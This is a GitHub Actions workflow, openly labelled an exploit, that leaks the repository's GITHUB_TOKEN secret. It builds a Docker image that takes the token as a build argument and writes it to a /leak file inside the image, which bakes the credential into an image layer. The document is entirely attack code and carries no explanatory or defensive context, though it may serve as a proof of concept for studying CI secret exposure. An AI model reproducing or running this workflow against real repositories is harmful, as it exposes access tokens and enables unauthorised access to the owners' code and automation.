name: Leak GITHUB_TOKEN via Docker ARG Injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Create malicious Dockerfile
        run: |
          echo "FROM alpine:latest" > Dockerfile
          echo "ARG TOKEN" >> Dockerfile
          echo 'RUN echo "GITHUB_TOKEN=$TOKEN" > /leak' >> Dockerfile

      - name: Build Docker image with leaked token
        run: |
          docker build --build-arg TOKEN="${{ secrets.GITHUB_TOKEN }}" -t leak-image .
